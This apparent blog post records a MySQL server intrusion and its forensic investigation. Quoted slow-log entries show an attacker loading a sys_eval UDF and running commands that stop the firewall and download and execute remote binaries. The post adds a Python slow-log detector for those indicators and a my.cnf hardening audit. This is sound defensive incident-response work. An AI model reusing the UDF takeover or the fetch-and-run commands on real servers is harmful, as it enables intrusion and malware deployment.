#### Symptoms
- There were many strangely named processes (the screenshot from the actual incident was not kept; this one is a re-creation I made myself):
![screenshot](http://img.blog.csdn.net/20160928082801322)
##### Diagnosis step 1: find where the process's executable lives
Run the command below, replacing `pid` with the id of a suspicious process:
```
ll /proc/pid
```
The `exe` entry is a symlink to the executable, so it tells you where the process was started from. Opening that directory was a shock: the mysql directory and the mysql/data directory contained a lot of strange .so files and executables:
![screenshot](http://img.blog.csdn.net/20160928082623163)
![screenshot](http://img.blog.csdn.net/20160928082700165)
##### Diagnosis step 2: kill the processes and remove the files immediately
- Killing processes in bulk: here is a readable way to batch-kill processes that I saw on [stackoverflow](http://stackoverflow.com/questions/3510673/find-and-kill-a-process-in-one-line-using-bash-and-regex/3510850#3510850):
```
kill `ps -ef | grep [s]leep | awk '{print $2}'`
```
Explanation:
- The `[s]` in the pattern stops grep from matching its own command line, so no `grep -v grep` is needed
- `awk '{print $2}'` prints only the second column, the process id
- The backticks are shell syntax that runs the command and substitutes its output
- `kill` then receives every matching process id
##### Diagnosis step 3: change the root password & disable the anonymous FTP user
A normal attack has no way to upload trojan files, so my initial suspicion was that the server password had leaked, someone logged in with it and then uploaded the trojan script files. I changed the root password through the Aliyun console and rebooted the machine.
Another possibility was that the files were uploaded over FTP; I also found that the FTP anonymous user was enabled.
##### Diagnosis step 4: attacked again!!!
I thought that changing the root password and rebooting the server had solved the problem, but a day or two later Aliyun raised another alert, and the problem kept recurring every few days. I really could not think of the cause, until I finally noticed one thing: the trojan processes were all started by the mysql user. An attack on MySQL should not be able to start processes by itself, and even if there were SQL injection there would be no reason it could upload or download files.
##### Diagnosis step 5: capture the scene by enabling full MySQL query logging
Since the problem lay in MySQL, log every MySQL query by turning on the slow log and setting its time threshold to 0:
```
# find which option file the server reads
mysql --help | grep cnf
vi /etc/my.cnf
# the settings go in the [mysqld] section
[mysqld]
long_query_time=0
slow_query_log=ON
slow_query_log_file=/alidata/log/mysql/slow.log
```
##### Diagnosis step 5 (continued): analyze the log & the intrusion process
After watching for a while, slow.log made everything clear:
![screenshot](http://img.blog.csdn.net/20160928183201292)
There were many strange operations, including exporting with DUMPFILE:
```
// create the table
create table if not exists tempMix4(data LONGBLOB);
// step 1: set the variable
set @a = concat('',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
// step 2: insert it into the temporary table
INSERT INTO tempMix VALUES (@a);
// load the function
# User@Host: root[root] @  [115.28.238.77]  Id:     3
# Query_time: 0.001387  Lock_time: 0.000947 Rows_sent: 0  Rows_examined: 0
SET timestamp=1471084691;
CREATE FUNCTION sys_eval RETURNS string SONAME 'sys.so';
# User@Host: root[root] @  [115.28.238.77]  Id:     3
# Query_time: 0.000213  Lock_time: 0.000113 Rows_sent: 0  Rows_examined: 0
SET timestamp=1471084691;
select sys_eval("wget http://www.zuimihu.cn/DDos;chmod 777 DDos;./DDos;");
# Time: 160831  3:51:28
# User@Host: root[root] @  [121.42.195.49]  Id:   115
# Query_time: 2.444778  Lock_time: 0.000000 Rows_sent: 1  Rows_examined: 0
SET timestamp=1472586688;
select sys_eval("/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://211.127.220.60:809/TSmmm;chmod 777 TSmmm;./TSmmm;");
```
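The slow log above is the whole evidence trail, and the same indicators can be spotted automatically instead of by eye. The script below is an added example, not part of the original post: it parses MySQL slow-log entries (the `# User@Host` header followed by the statement) and flags the pattern seen in this incident: a LONGBLOB staging table, `INTO DUMPFILE`, `CREATE FUNCTION ... SONAME`, calls to `sys_eval`/`sys_exec`, and any root session that did not come from localhost. The sample log, its hosts and the plugin path are constructed for the example; it assumes one statement per line, as in the log shown above.

```python
import re
from dataclasses import dataclass

# Constructed sample in MySQL slow-log format (long_query_time=0, so every
# statement is recorded). Hosts, statements and the plugin path are made up.
SAMPLE_SLOW_LOG = """\
# Time: 160831  3:50:01
# User@Host: app[app] @ localhost []  Id:    12
# Query_time: 0.000310  Lock_time: 0.000100 Rows_sent: 1  Rows_examined: 1
SET timestamp=1472586601;
SELECT id, name FROM users WHERE id = 42;
# User@Host: root[root] @  [203.0.113.5]  Id:     3
# Query_time: 0.001387  Lock_time: 0.000947 Rows_sent: 0  Rows_examined: 0
SET timestamp=1472586688;
create table if not exists tempMix4(data LONGBLOB);
# User@Host: root[root] @  [203.0.113.5]  Id:     3
# Query_time: 0.000213  Lock_time: 0.000113 Rows_sent: 0  Rows_examined: 0
SET timestamp=1472586689;
SELECT data FROM tempMix4 INTO DUMPFILE '/PLUGIN_DIR_PLACEHOLDER/sys.so';
# User@Host: root[root] @  [203.0.113.5]  Id:     3
# Query_time: 0.000213  Lock_time: 0.000113 Rows_sent: 0  Rows_examined: 0
SET timestamp=1472586690;
CREATE FUNCTION sys_eval RETURNS string SONAME 'sys.so';
# User@Host: root[root] @  [203.0.113.5]  Id:     3
# Query_time: 2.444778  Lock_time: 0.000000 Rows_sent: 1  Rows_examined: 0
SET timestamp=1472586691;
select sys_eval("uname -a");
"""


@dataclass
class Entry:
    user: str
    host: str
    statement: str


# "# User@Host: user[user] @ hostname [ip]" - hostname is empty for TCP clients
ENTRY_HEADER = re.compile(
    r"^# User@Host:\s*(\w+)\[\w*\]\s*@\s*([^\s\[]*)\s*\[([^\]]*)\]"
)

# Indicators of the UDF-based takeover described in this post
INDICATORS = [
    ("udf-create", re.compile(r"\bCREATE\s+FUNCTION\b.*\bSONAME\b", re.I)),
    ("udf-exec", re.compile(r"\bsys_(eval|exec)\s*\(", re.I)),
    ("file-write", re.compile(r"\bINTO\s+(DUMPFILE|OUTFILE)\b", re.I)),
    ("blob-stage", re.compile(r"\bLONGBLOB\b", re.I)),
]
LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1"}


def parse_slow_log(text):
    """Turn slow-log text into Entry objects (one per statement line)."""
    entries = []
    user = host = None
    for line in text.splitlines():
        m = ENTRY_HEADER.match(line)
        if m:
            user = m.group(1)
            host = m.group(2) or m.group(3)  # hostname, else the IP in brackets
            continue
        if not line.strip() or line.startswith("#") or line.startswith("SET timestamp="):
            continue
        if user is not None:
            entries.append(Entry(user, host, line.strip()))
    return entries


def find_indicators(entries):
    """Return (host, tags, statement) for every entry matching an indicator."""
    hits = []
    for e in entries:
        tags = [name for name, rx in INDICATORS if rx.search(e.statement)]
        if e.user == "root" and e.host not in LOCAL_HOSTS:
            tags.append("remote-root")
        if tags:
            hits.append((e.host, tags, e.statement))
    return hits


def summarize(text):
    hits = find_indicators(parse_slow_log(text))
    return {"hits": hits, "suspect_hosts": sorted({h for h, _, _ in hits})}


if __name__ == "__main__":
    report = summarize(SAMPLE_SLOW_LOG)
    for host, tags, stmt in report["hits"]:
        print(f"{host:15} {','.join(tags):25} {stmt}")
    print("suspect hosts:", report["suspect_hosts"])
```

Running it on the constructed sample flags four of the five statements and names a single remote host; on a real slow log the `suspect_hosts` list is the set of IPs to block and to compare against the `mysql.user` host column.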
##### Diagnosis step 6: root cause of the intrusion
An intrusion through the application code is very unlikely; the only plausible explanation is that the MySQL root account's password leaked or was cracked. The slow log also shows that the client IP was not the local machine, so we can infer that the attacker logged in to MySQL remotely and then carried out the attack.
##### Diagnosis step 7: countermeasures
Passwords for core accounts must be sufficiently complex, kept secret and rotated regularly. Best of all, restrict logins by IP: allow root to log in only from the local machine, and create separate low-privilege accounts for everything else.
In the week since the passwords and permissions were changed, no problems have recurred.
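The advice above can be checked against the server's option file. The audit script below is an added example and not part of the original post: it reads the `[mysqld]` section of a `my.cnf`, and reports the three settings that mattered in this incident: whether the server listens beyond loopback (`bind-address` / `skip-networking`), whether `secure_file_priv` restricts where `SELECT ... INTO DUMPFILE` may write (an empty value lets a database user drop a `.so` into the plugin directory), and whether the slow log is on so there is a trail to reconstruct from. The two option files are constructed for the example; the hardened one uses the same log path as the post.

```python
import configparser

# Constructed option files for this example. The first mirrors the exposed
# setup behind the incident, the second is the hardened configuration.
WEAK_CNF = """\
[mysqld]
bind-address=0.0.0.0
secure_file_priv=
slow_query_log=OFF
"""

HARDENED_CNF = """\
[mysqld]
bind-address=127.0.0.1
secure_file_priv=/var/lib/mysql-files
slow_query_log=ON
long_query_time=0
slow_query_log_file=/alidata/log/mysql/slow.log
"""

LOOPBACK = {"127.0.0.1", "::1", "localhost"}


def load_mysqld_section(text):
    """Return the [mysqld] options as a dict with '-' normalised to '_'."""
    parser = configparser.ConfigParser(
        allow_no_value=True, interpolation=None, strict=False
    )
    # my.cnf may contain "!includedir" lines, which configparser rejects
    cleaned = "\n".join(
        line for line in text.splitlines() if not line.lstrip().startswith("!")
    )
    parser.read_string(cleaned)
    if not parser.has_section("mysqld"):
        return {}
    # MySQL treats '-' and '_' in option names as equivalent
    return {
        key.replace("-", "_"): (value.strip() if value is not None else "")
        for key, value in parser["mysqld"].items()
    }


def audit(text):
    """List the weak settings found; an empty list means all checks passed."""
    opts = load_mysqld_section(text)
    findings = []
    if "skip_networking" not in opts and opts.get("bind_address") not in LOOPBACK:
        findings.append(
            "bind_address: server listens on non-loopback interfaces, "
            "so root is reachable from the network"
        )
    if not opts.get("secure_file_priv"):
        findings.append(
            "secure_file_priv: empty or unset, SELECT ... INTO DUMPFILE may write "
            "into plugin_dir (older versions default to unrestricted)"
        )
    if opts.get("slow_query_log", "OFF").upper() not in ("1", "ON", "TRUE"):
        findings.append("slow_query_log: off, no statement trail for forensics")
    return findings


if __name__ == "__main__":
    for name, cnf in (("weak", WEAK_CNF), ("hardened", HARDENED_CNF)):
        print(f"{name}: {audit(cnf) or 'no findings'}")
```

`bind-address` only closes the network path; the account-level rule from step 7 (root allowed from localhost only, application users with their own grants) lives in the `mysql.user` table inside the server and cannot be read from the option file, so it still has to be reviewed separately.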
#### Further reading
- [MySQL slow query log explained: from parameters and configuration to analysis tools](http://mp.weixin.qq.com/s?__biz=MzI4NTA1MDEwNg==&mid=2650756876&idx=1&sn=d6c91752f05cfa0a3c55b4b3b433733a&chksm=f3f9e299c48e6b8f12f91018ce14a0e15acbffe8ce09f4c62a82661acd29abdce94723c13fc0&mpshare=1&scene=1&srcid=0929TCKiJ86ZAlthrUPVOs4s#rd)